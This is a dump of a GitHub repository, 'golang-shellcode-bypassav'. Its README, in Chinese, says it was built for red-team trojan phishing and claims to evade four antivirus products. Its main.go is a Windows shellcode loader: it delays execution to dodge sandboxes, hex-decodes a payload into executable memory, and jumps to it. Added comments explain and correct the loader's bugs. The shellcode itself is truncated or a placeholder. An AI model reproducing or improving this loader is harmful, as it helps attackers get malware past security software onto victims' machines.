├── 20211210165105.png ├── 20211210165311.png ├── README.md └── main.go /20211210165105.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/binganao/golang-shellcode-bypassav/1592c2286894bfa4658e932ccc5d59ff82032476/20211210165105.png -------------------------------------------------------------------------------- /20211210165311.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/binganao/golang-shellcode-bypassav/1592c2286894bfa4658e932ccc5d59ff82032476/20211210165311.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # golang-shellcode-bypassav 2 | 使用go语言免杀360、微软、腾讯、火绒 3 | 4 | 最近打红队,想搞个木马钓鱼用,刚好最近在学习 Go 语言便研究了一下 Golang 的免杀。免杀效果大概是这个样子。 5 | 6 | ![杀毒以及上线](https://github.com/binganao/golang-shellcode-bypassav/raw/main/20211210165105.png) 7 | 8 | ![微步分析](https://github.com/binganao/golang-shellcode-bypassav/raw/main/20211210165311.png) 9 | 10 | -------------------------------------------------------------------------------- /main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/hex" 5 | "syscall" 6 | "time" 7 | "unsafe" 8 | ) 9 | 10 | const ( 11 | MEM_COMMIT = 0x1000 12 | MEM_RESERVE = 0x2000 13 | PAGE_EXECUTE_READWRITE = 0x40 14 | ) 15 | 16 | var ( 17 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 18 | ntdll = syscall.MustLoadDLL("ntdll.dll") 19 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 20 | RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory") 21 | code = "fc4883e4f0e8c..." 
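// hex-encoded string for the `code` var above; not referenced by main below.
	// Hex-encoded shellcode that main decodes and executes. The `=` was
	// missing in the listing (`decode1 "shellcode here"`), which does not
	// compile; assumed to be a copy error — TODO confirm against the repo.
	decode1 = "shellcode here"
)

// startupDelay is the pause before the payload is touched (61s in the
// original). The README only says the loader is for AV evasion; the
// reason for this exact delay is not stated — presumably to outlast
// automated sandbox analysis windows. TODO confirm.
const startupDelay = 61 * time.Second

// main decodes the hex payload in decode1, copies it into a freshly
// allocated PAGE_EXECUTE_READWRITE region and transfers control to it.
// It does not return on success. On any failure (invalid hex, empty
// payload, allocation failure) it exits with status 1; the original
// exited with status 0, which reported success to whoever launched it.
func main() {
	time.Sleep(startupDelay)

	// The original discarded this error. With the placeholder string
	// hex.DecodeString returns an empty slice plus an error, and the
	// `&payload[0]` below then panics; a typo in a real hex string would
	// silently run a truncated buffer. Note the original called this
	// `xor_code` although no XOR is applied — it is the plain decoded bytes.
	payload, err := hex.DecodeString(decode1)
	if err != nil || len(payload) == 0 {
		syscall.Exit(1)
	}

	// Proc.Call always returns a non-nil error (it is just GetLastError),
	// so the failure signal is the primary return value: VirtualAlloc
	// returns 0 on failure. The original compared err.Error() against the
	// English text "The operation completed successfully.", which is a
	// localized FormatMessage string and so breaks on non-English systems.
	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(payload)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	if addr == 0 {
		syscall.Exit(1)
	}

	// RtlCopyMemory has no failure return value; the GetLastError the
	// original inspected after this call could only trigger a spurious exit.
	RtlCopyMemory.Call(addr, uintptr(unsafe.Pointer(&payload[0])), uintptr(len(payload)))

	// On Windows syscall.Syscall calls the procedure whose address is its
	// first argument, so passing the buffer address jumps into the payload.
	syscall.Syscall(addr, 0, 0, 0, 0)
}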